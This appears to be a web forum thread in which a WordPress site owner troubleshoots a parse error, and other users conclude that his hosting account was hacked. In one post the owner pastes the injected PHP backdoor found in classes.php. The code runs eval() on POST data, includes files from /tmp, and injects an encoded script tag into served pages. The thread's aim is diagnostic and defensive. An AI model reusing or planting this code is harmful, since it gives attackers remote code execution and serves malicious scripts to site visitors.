Bizarre WordPress Problem

22 replies
Hi. I would appreciate any help anyone may be able to offer. I have just discovered that a number of my wordpress 2.7 sites that are hosted on ResellerZoom are all down and all showing the same error message when you point a browser at the URL:

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/xxxxxx/public_html/wp-includes/classes.php on line 1572

The sites are on the same server and were all fine this morning. I've just discovered the problem and am baffled. (I have written to Resellerzoom tech support .) Would anyone have any idea what this is and how I might go about fixing it?

Thanks,
Evan
#bizarre #problem #wordpress
  • Profile picture of the author JayXtreme
    Did you recently install any new plugins?

    RZ are notorious for having issues with wordpress...
    Signature

    Bare Murkage.........

    {{ DiscussionBoard.errors[599743].message }}
  • Profile picture of the author JayXtreme
    Can you login to your blogs?..

    If so..

    Disable all plugins, if the problem persists, contact RZ to discuss, it is very likely that the problem is on their end if it is not a plugin you recently added...

    If you can't login to your blogs.. you will have to download all your plugins via FTP and then delete them from your blog one by one

    Peace

    Jay
    Signature

    Bare Murkage.........

    {{ DiscussionBoard.errors[599801].message }}
  • Profile picture of the author ecdavis
    Jay,

    At this time, I cannot log in to the blog--I get the same error message posted above. I've been using the same set of plugins for quite awhile without problem. The only new one was the firewall plugin I installed a few days ago, and that doesn't appear to be causing the problem. This is strange as all the blogs are showing the same error, all are on the same RZ server. I'm waiting to hear from RZ tech support.

    Thank you again for your thoughts on this,
    Evan
    {{ DiscussionBoard.errors[599832].message }}
    • Profile picture of the author Eric Lorence
      Check for a hack by FTP if you can, and change all your access passwords.

      Update WP to the latest version, if you used Fantastico, it usually isn't the latest.
      {{ DiscussionBoard.errors[599923].message }}
  • Profile picture of the author ecdavis
    Eric,

    Hi. Although I can access my sites by FTP, how would I check for a hack. I wouldn't know where to begin. However, I could do a reinstall or upgrade to 2.7.1.

    Thanks,
    Evan
    {{ DiscussionBoard.errors[599947].message }}
    • Profile picture of the author Eric Lorence
      Yes, try to upload the updated files first, then upload and overwrite the file/s named in the error from the original install folder on your computer.

      If the problem clears up, then it was probably a hack, or file corruption.
      {{ DiscussionBoard.errors[600086].message }}
  • Profile picture of the author ecdavis
    I'm going to try to replace files on one of the domains that is somewhat disposable. But, I was just trying to upload a new wp-includes folder, and I'm having a hard time even holding a connection to RZ. I'm beginning to think more along the lines that this may be a problem with RZ. In the past they've had a very fast tech support response time, but I've been waiting a couple of hours now.

    Evan
    {{ DiscussionBoard.errors[600123].message }}
  • Profile picture of the author ecdavis
    I just replaced the wp-includes folder and the basic files (not the wp-config file) and got this:

    Warning: require(/home/xxxxx/public_html/wp-includes/classes.php) [function.require]: failed to open stream: No such file or directory in /home/xxxxxx/public_html/wp-settings.php on line 240

    Fatal error: require() [function.require]: Failed opening required '/home/xxxxxx/public_html/wp-includes/classes.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxxxxx/public_html/wp-settings.php on line 240

    Evan
    {{ DiscussionBoard.errors[600153].message }}
    • Profile picture of the author Eric Lorence
      The upload may not have completed successfully, but with all the problems, I would lean on host support about this.
      {{ DiscussionBoard.errors[600209].message }}
    • Profile picture of the author Kelvin Nikkel
      Originally Posted by ecdavis View Post

      I just replaced the wp-includes folder and the basic files (not the wp-config file) and got this:

      Warning: require(/home/xxxxx/public_html/wp-includes/classes.php) [function.require]: failed to open stream: No such file or directory in /home/xxxxxx/public_html/wp-settings.php on line 240

      Fatal error: require() [function.require]: Failed opening required '/home/xxxxxx/public_html/wp-includes/classes.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxxxxx/public_html/wp-settings.php on line 240

      Evan
      Hi Evan.

      If you are doing an update, DON"T do it via external methods if you initially installed via Fantastico. Reinstall USING Fantastico only or you will end up reformatting your mySQL thereby deleting all your existing posts!

      I HIGHLY recommend that you go to your cPanel and backup your database before you do one more thing!

      The reason you got the above errors is because the files you uploaded have not been reconfigured for your site. When you initially started your site by installing the platform (ie=wordpress, drupal, etc) some things get changed in some of the files. That is why you got the errors.

      I hope this helps. If I can help further, let me know.

      Kelvin
      {{ DiscussionBoard.errors[600334].message }}
  • Profile picture of the author ecdavis
    I just received a response from RZ saying that I should consult a php developer. Hmm. I'm going to delete the blog I can afford to delete and just do a reinstall from the RZ cpanel to see what happens.

    Evan
    {{ DiscussionBoard.errors[600304].message }}
  • Profile picture of the author ecdavis
    Kelvin,

    Hi. Fortunately, I did back up my files. However, I have gone ahead and deleted the blog (it was disposable) and reinstalled using fantastico. The result of the reinstallation is nothing. That is, when I point the browser at the the URL I get a blank page and when I attempt to log in wordpress won't recognize the username and password.

    Regarding the replacement of files, my original installation was done with fantastico. However, I have since upgraded the blog manually without any negative results. This malfunction has come out of the blue, as it were. Everything was fine and then nothing.

    Edit: I deleted the fantastico intall I just did and did another fantastico reinstall. This time it took and the blog seems to be functioning. However, I'm not sure what to do about the others.

    Evan
    {{ DiscussionBoard.errors[600373].message }}
  • Profile picture of the author kettlewell
    Evan, if this has happened out of the blue, then another thing that might have happened is a PHP upgrade.

    I looked at line 1572 on my WP 2.7.1 and it is just an echo statement in the send() function.

    Could you post what you have on line 1572 of classes.php and a few lines before and after... maybe it will tell us what is going on.

    Another thing that might have changed is your basedir settings ... I usually set mine to open_basedir none just to avoid certain 'unable to open stream' errors ... it's a file permission thing from the viewpoint of the apache server.

    Matt
    {{ DiscussionBoard.errors[600391].message }}
  • Profile picture of the author ecdavis
    Matt,

    Thank you. Here is line 1572 of wp 2.7:

    echo "<?xml version='1.0' standalone='yes'?><?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<1 0;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCc4dCU zQ0djc0FPY0FPcktLMmlwQU90OHQlMjBLSzJzOHRyY211JTNEJ TJGJTJGS0syNzhHYyUyRUtLMjFLSzIxMCUyRUFPMTc1JTJFMjZ EQzQ5JTJGam11cXVlcnlHYyUyRW11akFPczh0JTNFJTNDS0syJ TJGczh0Yzh0cmlwOHR0OHQlM0UnKS5yZXBsYWNlKC9BT3w2REN 8R2N8QU98OHR8MU8zfG11fFUwfEtLMi9nLCIiKSk7CiAtLT48L 3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==' 1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos( $v,'document.write')))$s=str_replace($v,'',$s);}$s 1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_re place('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);else if(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1]; } if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><wp_ajax>";

    Much obliged!
    Evan
    {{ DiscussionBoard.errors[600471].message }}
    • Profile picture of the author kettlewell
      Evan -

      I'm going to be frank here. I don't think that's original WordPress Code.

      In fact a Google Search
      tmp_lkojfghx - Google Search

      reveals that this your site (server?) has likely been hacked.

      What do you do? 1st and foremost - back EVERYTHING up.

      next. Due diliegence.
      verify the hack (go to wordpress forums, etc).
      do what they recommend

      if it was me? I'd back everything up, and switch physical servers (or hosting companies) and re-install every last site I have on that machine.

      Yes - it is going to be a long night for you.

      I'm sorry you're in this boat - let me know if there is anything else we can do to help.


      Matt
      {{ DiscussionBoard.errors[600497].message }}
  • Profile picture of the author ecdavis
    Matt,

    Hi. Thank you for your advice. I followed your link, and I see what you mean. I will very likely follow your advice and move my sites away from RZ and do complete reinstalls. Thanks to your observations about the code, I've been able to track down and delete the malicious code chunk on one the sites and bring it back up. I'll try to do that with the others. Any chance you might be available for professional installation services and site hardening?

    Evan
    {{ DiscussionBoard.errors[600560].message }}
    • Profile picture of the author kettlewell
      Evan -

      I sent you a PM with install details.

      Matt
      {{ DiscussionBoard.errors[600746].message }}
  • Profile picture of the author ecdavis
    Thank you, Matt. I have replied.

    Evan
    {{ DiscussionBoard.errors[600785].message }}
  • Profile picture of the author kettlewell
    Evan -

    I'm not sure that I can do more for your security audit than what this WordPress Plugin does...

    WordPress › WP Security Scan WordPress Plugins

    I've not used it, but it seems to get a lot of good reviews...

    I just might install it on my sites, just to see what it says about my installations...

    Matt
    {{ DiscussionBoard.errors[600844].message }}
  • Profile picture of the author ecdavis
    Thank you, I'll give it a try. You might be amused to know that I've heard back from RZ, and the individual replying was unsure that the sites had been hacked. More amusing is that he seemed to think that all of the sites were Joomla sites.

    Edit: In all fairness to RZ, their tech support is very responsive and they do try to do the best job possible.

    Evan
    {{ DiscussionBoard.errors[600921].message }}
    • Profile picture of the author focused313
      hello,

      I have the same issue on my server, same hacked code and everything.

      1. check your own personal computer for viruses using a few different malware programs. In addition to AVG, use malwarebytes and counterspy. You may find that your own computer is being backdoored.

      2. Backing up your database and moving it will NOT fix your issue. I did that to one of my sites and moved the site to another hosted account I had........the hack did the same thing not only to that site, but to every site i had on the hosting account. That leads me to believe, as I read, that you'd need the backup from BEFORE the site was hacked. The hack is in the database, not just the _public folder. You'd need to wipe out the hack file in the database or you'd just be moving it to whatever site you go to.

      That's the part I'm currently at, trying to figure out what the hacked file in the database is. Using the phpadmin "search" feature for any parts of the hack may help, along with looking for any ip's loading in the window when you visit one of your sites.
      {{ DiscussionBoard.errors[647512].message }}

Trending Topics